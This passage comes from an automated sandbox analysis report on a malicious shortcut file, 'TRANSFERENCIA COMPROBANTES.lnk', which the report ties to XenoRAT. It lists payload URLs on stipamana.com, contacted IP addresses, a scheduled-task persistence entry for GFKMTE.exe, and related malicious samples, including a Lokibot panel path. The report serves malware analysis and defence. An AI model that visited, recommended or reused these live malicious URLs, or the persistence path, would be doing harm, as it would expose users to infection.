                                                                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgWwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://www.stipamana.com/docdryhsfghdfghdfhgd/wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgwscript.exe, wscript.exe, 0000000A.00000003.1470927034.000002943054C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489808249.000002942ED54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfy??owscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://www.stipamana.com/docdryhsfgwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://g.live.com/odclientsettings/Prod1C:svchost.exe, 0000000D.00000003.1409195872.000002DD7EA09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgData=C:wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://www.stipamana.com/docdryhsfghdfwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthBwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://www.stipamana.com:443/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrwscript.exe, 0000000A.00000003.1467671580.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1491729771.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473511321.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1477018602.0000029430A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgleswscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xswscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfgwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkuj.wscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhsfghwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhiwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdiiowscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsrwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgtwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfTTowscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdfpowershell.exe, 00000001.00000002.1390837542.000001BD2B396000.00000004.00000020.00020000.00000000.sdmp, TRANSFERENCIA COMPROBANTES.lnktrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tdwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.stipamana.wscript.exe, 0000000A.00000002.1489540789.000002942EB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1485573797.000002942EB5D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.stipamana.com/docd.dlluwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        http://go.microspowershell.exe, 00000001.00000002.1391471213.000001BD2E3B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdgwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsqwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.stipamana.comHELL32.dll$wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://contoso.com/powershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://www.stipamana.com/docdryhswscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://www.stipamana.com/dPT32.dllwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://www.stipamana.compowershell.exe, 00000001.00000002.1391471213.000001BD2DDAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjuwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkujgwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470416027.000002942EBE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470130563.000002942EBE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1485175841.0000029430A0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470416027.000002942EBC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.stipamana.com/doapi.dllwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghppjwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythOFILE=C:wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzspwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsd:wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://www.stipamana.com/powershell.exe, 00000001.00000002.1442529638.000001BD45949000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000001.00000002.1391471213.000001BD2E768000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000D.00000003.1409195872.000002DD7E9B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.microsoft.powershell.exe, 00000001.00000002.1441636494.000001BD458D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdEwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown

                                                                                                                  World Map of Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public IPs

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  87.120.121.160
                                                                                                                  		dns.stipamana.comBulgaria
                                                                                                                  		25206UNACS-AS-BG8000BurgasBGfalse
                                                                                                                  52.123.243.181
                                                                                                                  		mira-tmc.tm-4.office.comUnited States
                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                  94.156.167.57
                                                                                                                  		www.stipamana.comBulgaria
                                                                                                                  		48584SARNICA-ASBGfalse

                                                                                                                  Private

                                                                                                                  IP
                                                                                                                  127.0.0.1

                                                                                                                  General Information

                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1571198
                                                                                                                  Start date and time:2024-12-09 06:51:20 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 8m 30s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:41
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:TRANSFERENCIA COMPROBANTES.lnk
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.expl.evad.winLNK@35/244@2/4
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 16.7%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  • Number of executed functions: 306
                                                                                                                  • Number of non-executed functions: 4
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .lnk

                                                                                                                  Warnings

                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.28.46, 23.32.238.232, 23.32.238.235, 23.32.238.210, 23.32.238.242, 23.32.238.185, 23.32.238.243, 23.32.238.226, 23.32.238.224, 23.32.238.217, 23.218.208.109, 52.109.68.129, 20.44.10.123, 52.111.252.18, 52.111.252.16, 52.111.252.15, 52.111.252.17, 95.101.110.27, 95.101.110.24, 23.32.238.169, 23.32.238.195, 23.32.238.200, 23.32.238.241
                                                                                                                  • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, time.windows.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, onedscolprdcus05.centralus.cloudapp.azure.com, a1847.dscg2.akamai.net, roaming.officeapps.live.com, login.live.com, e16604.g.akamaiedge.net, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod-all.naturallanguageeditorservice.osi.office.net.akadns.net, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod-inc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.c
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 1168 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 1876 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 3672 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 5528 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 6972 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 7176 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 8076 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 8084 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 8112 because it is empty
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2892 because it is empty
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  00:52:19API Interceptor41x Sleep call for process: powershell.exe modified
                                                                                                                  00:52:31API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                  02:03:14API Interceptor594079x Sleep call for process: GFKMTE.exe modified
                                                                                                                  02:03:14API Interceptor2x Sleep call for process: wscript.exe modified
                                                                                                                  08:03:27Task SchedulerRun new task: mrec path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  87.120.121.160TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                    Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                      dHrrqccwkL.docGet hashmaliciousXenoRATBrowse
                                                                                                                        zVUq6L4FrV.docGet hashmaliciousXenoRATBrowse
                                                                                                                          Estado de cuenta.xlsGet hashmaliciousXenoRATBrowse
                                                                                                                            Outstanding_Payment.vbsGet hashmaliciousXenoRATBrowse
                                                                                                                              Outstanding_Payment.vbs_.vbsGet hashmaliciousXenoRATBrowse
                                                                                                                                Outstanding_Payment.vbs_.vbsGet hashmaliciousXenoRATBrowse
                                                                                                                                  52.123.243.181Note no. ROC 2453-2024.docGet hashmaliciousUnknownBrowse
                                                                                                                                    94.156.167.57zZeXr4mg0S.exeGet hashmaliciousLokibotBrowse
                                                                                                                                    • www.stipamana.com/dftjedrshyyj/Panel/five/fre.php

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    mira-tmc.tm-4.office.comList of required items.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.179
                                                                                                                                    K0Szg26cRh.docGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.180
                                                                                                                                    Note no. ROC 2453-2024.docGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    https://trinasolarus-my.sharepoint.com/:f:/g/personal/matt_hutchison_trinasolar_com/EuTm6V8CKxFPmV0-8tDYkU8B7bgg8BNpE1Urptg3NNJsZw?e=bQub2MGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.183
                                                                                                                                    MdDRzxozMD.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.183
                                                                                                                                    NEW ORDER #233.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.178
                                                                                                                                    Citation(1).docxGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.177
                                                                                                                                    https://theoggroup-my.sharepoint.com/:u:/g/personal/rohit_theoggroup_co/EW1S6u7eBPZAkl8sn76CFW4B9_fhjfgaN299JnYAgaQ9MQ?e=CXhREy&xsdata=MDV8MDJ8RGVib3JhaC5DbGFya0BtcGZ0Lm5ocy51a3w5NDRiZjU4NDRlNTk0NmZlNWNlNTA4ZGQwZmI5NDMxMnxjMzdkNjM1N2M4OGI0MjZiYjY4MGRmODE2NmE4NmVkN3wwfDB8NjM4Njg0MDEwNTcwNTEwNzIwfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=MHA0b3IvdkFFTytKRVJ3WGJUSzFiaW1jbm16a2hNNURVamQwbGRiNFB6RT0%3dGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.180
                                                                                                                                    https://ymcajeffco-my.sharepoint.com/:u:/g/personal/rcampbell_mtvernonymca_org/Eb_PxgSrk7VCrlppYfmkXowB9vCdCR2cgdVG8AQkH7BcbQ?e=b9efJ2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 52.123.243.182
                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                    • 52.123.243.184
                                                                                                                                    dns.stipamana.comTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    dHrrqccwkL.docGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    zVUq6L4FrV.docGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Estado de cuenta.xlsGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    Outstanding_Payment.vbsGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    Outstanding_Payment.vbs_.vbsGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    Outstanding_Payment.vbs_.vbsGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.121.160
                                                                                                                                    Pago pendiente.vbsGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.120.27
                                                                                                                                    ZOF8q1td7Q.docGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 87.120.120.27
                                                                                                                                    bg.microsoft.map.fastly.netfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    file.exeGet hashmaliciousQuasarBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    file.exeGet hashmaliciousQuasarBrowse
                                                                                                                                    • 199.232.210.172
                                                                                                                                    file.exeGet hashmaliciousAveMaria, StormKitty, VenomRATBrowse
